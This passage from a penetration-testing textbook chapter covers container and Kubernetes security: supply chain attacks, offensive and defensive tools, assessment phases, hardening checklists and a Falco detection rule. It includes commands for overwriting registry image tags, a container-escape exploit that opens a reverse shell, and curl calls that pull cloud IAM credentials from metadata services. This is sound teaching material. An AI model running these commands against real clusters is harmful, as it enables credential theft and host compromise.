Source Code → Build System → Base Images → Dependencies →
Container Registry → Deployment Pipeline → Running Containers
Each link in this chain is a potential attack vector. Supply chain attacks are particularly devastating because they compromise the trusted deployment process itself.
32.6.2 Image Supply Chain Attacks
Typosquatting:
Attackers publish malicious images with names similar to popular legitimate images:
- nginx vs nginnx
- python vs pythonn
- node vs n0de
Base Image Poisoning: If an attacker compromises an upstream base image (e.g., an official language runtime image), every image built on top of it inherits the compromise.
Tag Mutability:
Docker tags are mutable—the latest tag or even specific version tags can be overwritten:
# An attacker with registry write access could:
docker pull medsecure/patient-api:v2.1 # Legitimate image
docker tag malicious-image:latest medsecure/patient-api:v2.1
docker push medsecure/patient-api:v2.1 # Overwrites legitimate image
# Defense: Use image digests instead of tags
# medsecure/patient-api@sha256:abc123... (immutable reference)
32.6.3 Build Pipeline Attacks
CI/CD pipelines that build and deploy containers are high-value targets:
# Example: Compromised GitHub Actions workflow
name: Build and Deploy
on: push
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
# Attacker compromises a third-party action
- uses: compromised-org/build-helper@v1
# This action exfiltrates secrets and injects malicious code
- run: docker build -t myapp:${{ github.sha }} .
- run: docker push registry.example.com/myapp:${{ github.sha }}
Codecov Supply Chain Attack (2021): Attackers modified the Codecov Bash Uploader script—a tool used in CI/CD pipelines—to exfiltrate environment variables, including credentials and tokens. Because this script ran inside Docker containers in CI pipelines, it had access to registry credentials, cloud provider tokens, and signing keys. This attack is explored in detail in Case Study 2.
32.6.4 Runtime Supply Chain Risks
Even after deployment, supply chain risks persist:
- Image pull policies:
imagePullPolicy: Alwaysmeans a re-tagged image in the registry could replace a running workload - Init containers: Often overlooked in security reviews, init containers run before the main application and may have elevated privileges
- Sidecar injection: Service meshes and monitoring tools inject sidecar containers automatically; compromising the injection mechanism affects all pods
32.6.5 Defending the Container Supply Chain
🔵 Blue Team Perspective: A comprehensive container supply chain defense includes:
- Image Signing and Verification — Use cosign or Notary to sign images and enforce signature verification at deployment time via admission controllers
- Immutable Tags / Digest Pinning — Reference images by SHA256 digest, not mutable tags
- Private Base Images — Maintain curated, scanned base images rather than pulling directly from Docker Hub
- SBOM Generation — Create Software Bills of Materials for every image to track dependencies
- Admission Controllers — Use OPA Gatekeeper or Kyverno to enforce security policies at deployment time
- Pipeline Hardening — Isolate CI/CD environments, rotate credentials, minimize secret exposure
- Continuous Scanning — Scan images not just at build time but continuously for newly discovered CVEs
32.7 Tools and Techniques for Container Security Assessment
32.7.1 Offensive Tools
| Tool | Purpose | Key Usage |
|---|---|---|
| kube-hunter | K8s penetration testing | Discovers and exploits K8s vulnerabilities |
| peirates | K8s exploitation | Automates common K8s attack techniques |
| CDK | Container escape toolkit | Automated escape detection and exploitation |
| deepce | Docker enumeration | Comprehensive Docker security enumeration |
| kubectl-who-can | RBAC analysis | Identifies overprivileged accounts |
| kubeaudit | K8s configuration audit | Checks for security misconfigurations |
| trivy | Vulnerability scanning | Scans images, configs, IaC |
| grype | Vulnerability scanning | SCA for container images |
Using kube-hunter:
# Remote scanning
kube-hunter --remote K8S_API_IP
# Internal scanning (from within the cluster)
kubectl run kube-hunter --image=aquasec/kube-hunter --restart=Never \
-- --pod
# Active exploitation mode (use with caution!)
kube-hunter --remote K8S_API_IP --active
Using CDK (Container Escape Toolkit):
# Run CDK inside a container for automated assessment
./cdk evaluate
# Check for escape vectors
./cdk evaluate --full
# Exploit specific vulnerability
./cdk run shim-pwn <reverse_shell_ip> <port>
32.7.2 Defensive Tools
| Tool | Purpose |
|---|---|
| kube-bench | CIS Kubernetes Benchmark checks |
| Falco | Runtime security monitoring |
| OPA Gatekeeper | Policy enforcement admission controller |
| Kyverno | Kubernetes-native policy management |
| Aqua Security | Full container security platform |
| Sysdig Secure | Runtime container security |
| Neuvector | Container network and runtime security |
Using kube-bench:
# Run kube-bench for CIS Benchmark compliance
kubectl apply -f https://raw.githubusercontent.com/aquasecurity/kube-bench/main/job.yaml
kubectl logs job/kube-bench
# Check specific sections
kube-bench run --targets master
kube-bench run --targets node
kube-bench run --targets etcd
32.7.3 Security Assessment Methodology
A structured approach to container and Kubernetes penetration testing:
Phase 1: Reconnaissance - Identify container orchestration platform and version - Enumerate exposed ports and services - Discover Kubernetes API server, dashboard, and kubelet endpoints - Map the container registry infrastructure
Phase 2: Image Analysis - Scan all accessible images for CVEs - Inspect image layers for embedded secrets - Review Dockerfiles and build configurations - Assess base image provenance and update frequency
Phase 3: Configuration Audit - Run kube-bench for CIS compliance - Enumerate RBAC policies for overpermissioning - Check network policies for segmentation - Review pod security standards / pod security policies - Assess Secrets management practices
Phase 4: Exploitation - Attempt API server anonymous access - Test kubelet API authentication - Enumerate and abuse service account permissions - Attempt container escapes from compromised pods - Test lateral movement between namespaces
Phase 5: Post-Exploitation - Pivot to cloud provider APIs using pod credentials - Access secrets stores (etcd, external vaults) - Demonstrate data exfiltration paths - Document complete attack chains
Phase 6: Reporting - Map findings to CIS Kubernetes Benchmark controls - Prioritize by exploitability and impact - Provide specific remediation steps - Include architecture-level recommendations
32.8 Hardening Containers and Kubernetes
32.8.1 Docker Hardening Checklist
✅ Docker Hardening Best Practices: - Run containers as non-root users - Use read-only root filesystems (
--read-only) - Drop all capabilities and add only what is needed (--cap-drop ALL --cap-add NET_BIND_SERVICE) - Enable seccomp profiles - Enable AppArmor or SELinux profiles - Do not mount the Docker socket into containers - Use multi-stage builds to minimize image size - Scan images in CI/CD and block deployment of vulnerable images - Pin base images to digests, not tags - Set memory and CPU limits - Use user namespaces (--userns-remap) - Enable Docker Content Trust for image signing
32.8.2 Kubernetes Hardening Checklist
✅ Kubernetes Hardening Best Practices: - Enable RBAC and follow least privilege - Do not use the
defaultservice account for workloads - Encrypt Secrets at rest in etcd - Enable audit logging - Implement network policies for pod-to-pod segmentation - Use Pod Security Standards (Restricted profile) - Disable anonymous authentication on API server - Enable TLS everywhere (API server, kubelet, etcd) - Use admission controllers (OPA Gatekeeper, Kyverno) to enforce policies - Rotate certificates and tokens regularly - Keep Kubernetes version up to date - Restrict access to etcd - Disable the Kubernetes Dashboard or secure it properly - Use a service mesh for mTLS between services - Implement resource quotas and limit ranges
32.8.3 Runtime Security Monitoring
Beyond configuration hardening, continuous runtime monitoring detects active attacks:
# Example Falco rule: Detect container escape attempt
- rule: Container Escape via mount
desc: Detect attempts to mount host filesystems from within containers
condition: >
spawned_process and container and
proc.name = mount and
proc.args contains "/dev/sd"
output: >
Container escape attempt via mount detected
(user=%user.name container=%container.name image=%container.image.repository
command=%proc.cmdline)
priority: CRITICAL
tags: [container, escape]
32.9 Cloud-Specific Considerations
32.9.1 Managed Kubernetes Services
The major cloud providers offer managed Kubernetes services that handle control plane management but introduce cloud-specific attack vectors:
AWS EKS (Elastic Kubernetes Service): - IAM roles for service accounts (IRSA) can be misconfigured - EKS worker nodes have IAM instance profiles - The IMDS (Instance Metadata Service) is accessible from pods unless blocked - VPC CNI plugin has specific network security implications
Azure AKS (Azure Kubernetes Service): - Azure Active Directory integration for authentication - Managed identity for pods - Azure Policy integration for compliance - The Azurescape vulnerability (CVE-2021-41367) demonstrated cross-tenant escape
Google GKE (Google Kubernetes Engine): - Workload Identity for GCP service account binding - GKE Autopilot enforces hardened security baseline - Metadata server access from pods
Cloud IMDS Exploitation from Pods:
# AWS: Access Instance Metadata Service
curl -s http://169.254.169.254/latest/meta-data/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# For IMDSv2 (requires token)
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Azure: Access Instance Metadata Service
curl -s -H "Metadata: true" \
"http://169.254.169.254/metadata/instance?api-version=2021-02-01"
# GCP: Access Metadata Service
curl -s -H "Metadata-Flavor: Google" \
"http://metadata.google.internal/computeMetadata/v1/"
⚠️ Critical Cloud Risk: In ShopStack's AWS EKS environment, the worker node's IAM role had S3 read access for application configuration. By exploiting a web application vulnerability in a pod, we accessed the IMDS, obtained temporary AWS credentials, and used them to read S3 buckets containing customer data—all without escaping the container.
32.9.2 Multi-Tenancy Risks
Shared Kubernetes clusters serving multiple teams or customers present unique risks: - Namespace isolation is not a security boundary without network policies - Shared node resources enable noisy neighbor attacks - Cluster-wide resources (ClusterRoles, PriorityClasses) can be abused - Shared admission controllers and mutating webhooks affect all tenants
Assessment Approach for Multi-Tenant Clusters:
When assessing multi-tenant Kubernetes environments, evaluate each isolation dimension:
- Network Isolation: Are network policies enforced between tenant namespaces? Can pods in tenant A reach services in tenant B?
- RBAC Isolation: Can tenant A's service accounts list resources in tenant B's namespace? Are ClusterRoles properly scoped?
- Resource Isolation: Are ResourceQuotas and LimitRanges enforced? Can one tenant consume all cluster resources?
- Node Isolation: Are dedicated node pools used for different tenants? Are node affinities enforced?
- Storage Isolation: Can tenant A access tenant B's PersistentVolumes? Are storage classes properly segmented?
32.10 Service Mesh Security Considerations
32.10.1 Understanding Service Meshes
Service meshes like Istio, Linkerd, and Consul Connect add a layer of network abstraction to Kubernetes clusters. They provide mutual TLS (mTLS) between services, traffic management, and observability. From a security assessment perspective, service meshes both improve and complicate the security posture.
Security Benefits of Service Meshes: - Automatic mTLS encrypts all inter-service traffic - Fine-grained access policies control which services can communicate - Traffic is observable through the mesh's telemetry - Certificate rotation is automated
Security Risks of Service Meshes: - Increased attack surface through additional control plane components - Misconfigured policies may allow unauthorized access - Sidecar injection mechanisms can be exploited - The mesh's certificate authority is a high-value target - Permissive mode (allowing non-mTLS traffic) undermines the security model
Istio-Specific Assessment Points:
# Check Istio installation
kubectl get pods -n istio-system
# Check if mTLS is enforced
kubectl get peerauthentication -A
# Look for permissive mode (mTLS optional, not enforced)
kubectl get peerauthentication -A -o json | \
jq '.items[] | select(.spec.mtls.mode=="PERMISSIVE") | .metadata.name'
# Check authorization policies
kubectl get authorizationpolicy -A
# An empty output means no authorization policies exist
# (all traffic allowed between services by default)
🔵 Blue Team Perspective: Service meshes provide powerful security capabilities, but they must be configured correctly. Common mistakes include leaving mTLS in permissive mode (which allows plaintext connections), failing to define authorization policies (which allows all service-to-service communication), and not monitoring the mesh control plane for compromise.
32.10.2 Bypassing Service Mesh Security
During penetration tests, you may encounter service meshes that appear to provide strong security. Test these bypass scenarios:
- Direct Pod-to-Pod Communication: If the mesh sidecar can be bypassed, direct pod communication may be possible without mTLS
- Headless Services: Headless services may not have sidecar injection, creating unencrypted communication paths
- Init Container Race Condition: The application container may start before the sidecar is ready, allowing brief unencrypted windows
- Control Plane Compromise: If the Istio control plane (istiod) is compromised, the attacker can modify traffic routing and disable mTLS enforcement
32.11 Reporting Container and Kubernetes Findings
32.11.1 Structuring Your Report
Container and Kubernetes findings should be organized to help the audience understand both the individual vulnerabilities and the systemic risks:
Executive Summary Guidance: - Quantify the findings (e.g., "43% of pods run as root, 0 of 12 namespaces have network policies") - Highlight the most impactful attack chains, not just individual findings - Frame risks in business terms (HIPAA violations, data breach costs, service disruption)
Technical Finding Template:
For each finding, provide:
| Element | Description |
|---|---|
| Title | Clear, specific title (e.g., "Privileged Container in Production Namespace") |
| Severity | CVSS score or qualitative rating with justification |
| Affected Resource | Specific pod, namespace, deployment, or service |
| Description | What was found and why it matters |
| Proof of Concept | Exact commands and outputs demonstrating the issue |
| Impact | What an attacker could achieve through exploitation |
| Remediation | Specific, actionable steps to fix the issue |
| Reference | CIS benchmark control, NIST reference, or vendor documentation |
Common Findings and Suggested Severity Ratings:
| Finding | Suggested CVSS | Rationale |
|---|---|---|
| Privileged container | 9.0+ Critical | Direct path to host compromise |
| Docker socket mounted | 9.0+ Critical | Full daemon control |
| cluster-admin binding to SA | 9.0 Critical | Full cluster access |
| No network policies | 7.5 High | Enables unrestricted lateral movement |
| Secrets not encrypted at rest | 7.0 High | etcd backup exposes all secrets |
| Pods running as root | 6.5 Medium | Increases escape probability |
| No resource limits | 4.0 Medium | DoS potential |
| Image using latest tag | 3.0 Low | Supply chain risk, non-reproducibility |
32.11.2 Mapping to Compliance Frameworks
For regulated environments like MedSecure's healthcare infrastructure:
- HIPAA: Container misconfigurations that expose PHI (patient health information) should be mapped to relevant HIPAA Security Rule requirements
- PCI DSS: ShopStack's payment processing containers must meet PCI DSS requirements for network segmentation, access control, and vulnerability management
- SOC 2: Container security controls map to SOC 2 Trust Service Criteria for security, availability, and confidentiality
- CIS Benchmark: The CIS Kubernetes Benchmark provides the most specific, control-by-control mapping for Kubernetes security findings
32.12 Container Security in CI/CD Pipelines
32.12.1 Assessing the Build Pipeline
Modern container deployments are inseparable from their CI/CD pipelines. A comprehensive container security assessment must evaluate the pipeline that produces, scans, signs, and deploys images.
Pipeline Attack Surface:
Developer Workstation -> Source Control (GitHub/GitLab) ->
CI System (Jenkins/GitHub Actions/GitLab CI) ->
Build Environment (Docker-in-Docker/Kaniko) ->
Image Scanning (Trivy/Snyk) ->
Container Registry (ECR/GCR/ACR/Harbor) ->
Deployment (kubectl/ArgoCD/Flux) ->
Runtime Environment (Kubernetes)
Each component in this pipeline represents an attack or assessment target:
Source Control Risks: - Secrets committed to repositories (even in history after removal) - Branch protection bypass allowing malicious Dockerfile modifications - Dependency confusion in package managers referenced by Dockerfiles - Webhook hijacking to trigger unauthorized builds
CI System Risks: - CI runners with excessive permissions (Docker socket access, cloud credentials) - Shared CI runners where jobs from different repositories execute on the same host - Build cache poisoning between pipeline runs - Insecure storage of pipeline secrets
Registry Risks: - Unauthorized push access allowing image replacement - Missing vulnerability scan enforcement (images with critical CVEs deployed) - Tag mutability allowing image substitution after scanning - Registry credentials stored insecurely in pipeline configurations
32.12.2 Pipeline Security Assessment Methodology
When assessing a container CI/CD pipeline, follow this checklist:
📊 Pipeline Security Assessment Checklist: - [ ] Are Dockerfiles linted (hadolint) before build? - [ ] Are base images pinned to digests? - [ ] Are images scanned for vulnerabilities before push? - [ ] Are images signed and signatures verified at deployment? - [ ] Are CI/CD secrets stored securely (not in plaintext)? - [ ] Are CI runners isolated from production networks? - [ ] Are build caches cleared between sensitive builds? - [ ] Are container registries authenticated for both pull and push? - [ ] Do admission controllers enforce image provenance policies? - [ ] Are pipeline logs audited for secret leakage? - [ ] Is there a process for responding to newly discovered CVEs in running images? - [ ] Are SBOMs generated and stored for all production images?
ShopStack Pipeline Assessment Finding:
During ShopStack's assessment, the penetration testing team discovered that their GitHub Actions workflows used a self-hosted runner with Docker socket access and the cluster's kubeconfig file. An attacker who could modify a workflow file (through a compromised developer account or branch protection bypass) could build a malicious container image, push it to ShopStack's private registry using the runner's credentials, and deploy it directly to the production Kubernetes cluster. This finding was rated Critical because it represented a complete compromise path from source control to production. The remediation required isolating the CI runner, implementing branch protection, adding image signing, and deploying an admission controller that rejected unsigned images.
32.13 Practical Lab Exercises
32.13.1 Setting Up Your Lab
For the student home lab, set up a vulnerable Kubernetes environment:
# Install Minikube
curl -LO https://storage.googleapis.com/minikube/releases/latest/minikube-linux-amd64
sudo install minikube-linux-amd64 /usr/local/bin/minikube
# Start a Minikube cluster
minikube start --driver=docker --kubernetes-version=v1.27.0
# Deploy intentionally vulnerable applications
# Kubernetes Goat - Interactive vulnerability training
kubectl apply -f https://raw.githubusercontent.com/madhuakula/kubernetes-goat/master/guide/docs/scenarios/kubernetes-goat.yaml
# Or use kube-security-lab
git clone https://github.com/raesene/kube_security_lab
cd kube_security_lab && ./setup.sh
32.10.2 Recommended Practice Scenarios
- Docker Escape Lab: Create a privileged container and practice escape techniques
- RBAC Misconfiguration: Set up overpermissioned service accounts and practice escalation
- Secret Discovery: Deploy applications with secrets in environment variables, ConfigMaps, and Kubernetes Secrets; practice finding them
- Network Policy Bypass: Deploy pods across namespaces and test connectivity before and after network policies
- Supply Chain Simulation: Set up a private registry, push a "compromised" image, and trace the attack through deployment
🧪 Lab Safety: All container security exercises should be performed in isolated environments. Never practice container escapes on shared systems, cloud environments with other tenants, or production infrastructure. Minikube and kind provide safe, local environments for learning.
32.11 Summary
Container and Kubernetes security represents one of the fastest-growing areas in penetration testing. The shift from monolithic applications on traditional servers to microservices in containers has fundamentally changed the attack surface, introducing new vulnerability classes while also creating new defensive opportunities.
Key takeaways from this chapter:
-
Containers are not VMs — They share the host kernel, and this architectural reality creates escape opportunities that do not exist with hardware virtualization.
-
Image security is foundational — Vulnerable base images, embedded secrets, and supply chain compromises start at the build stage and propagate through the entire deployment.
-
Kubernetes RBAC is frequently misconfigured — Overpermissioned service accounts, wildcard permissions, and default account usage are among the most common findings in cluster assessments.
-
Secrets management requires active design — Kubernetes Secrets are base64-encoded, not encrypted by default. Proper Secrets management requires encryption at rest, external secret stores, and strict RBAC controls.
-
Network policies are rarely implemented — The default Kubernetes networking model allows all pod-to-pod communication. Without explicit network policies, lateral movement is trivial.
-
Supply chain attacks target the deployment pipeline — Compromising a container image or build process can affect hundreds or thousands of deployments silently.
-
Cloud-specific vectors extend the attack surface — Managed Kubernetes services interact with cloud IAM, metadata services, and provider APIs, creating additional exploitation paths.
As you develop your container security testing skills, remember that this field evolves rapidly. New CVEs, escape techniques, and attack patterns emerge regularly. Stay current by following Kubernetes security advisories, container runtime CVEs, and the research community's ongoing work in this space.
🔗 Next Chapter Preview: Chapter 33 explores another cutting-edge domain—AI and Machine Learning Security. As AI systems become increasingly embedded in applications and infrastructure, understanding their unique attack surfaces and vulnerabilities becomes essential for modern penetration testers.
References
- CIS Kubernetes Benchmark v1.8.0, Center for Internet Security, 2024.
- NIST SP 800-190, "Application Container Security Guide," National Institute of Standards and Technology, 2017.
- Kubernetes Security Documentation, https://kubernetes.io/docs/concepts/security/
- Docker Security Best Practices, https://docs.docker.com/develop/security-best-practices/
- "Threat Matrix for Kubernetes," Microsoft, https://microsoft.github.io/Threat-Matrix-for-Kubernetes/
- Madhu Akula, "Kubernetes Goat: Interactive Kubernetes Security Learning," 2023.
- Palo Alto Unit 42, "Siloscape: First Known Malware Targeting Windows Containers to Compromise Cloud Environments," 2021.
- Aqua Security, "Container Security Best Practices," 2024.
- OWASP Kubernetes Security Cheat Sheet, https://cheatsheetseries.owasp.org/cheatsheets/Kubernetes_Security_Cheat_Sheet.html
- NSA/CISA, "Kubernetes Hardening Guide," 2022.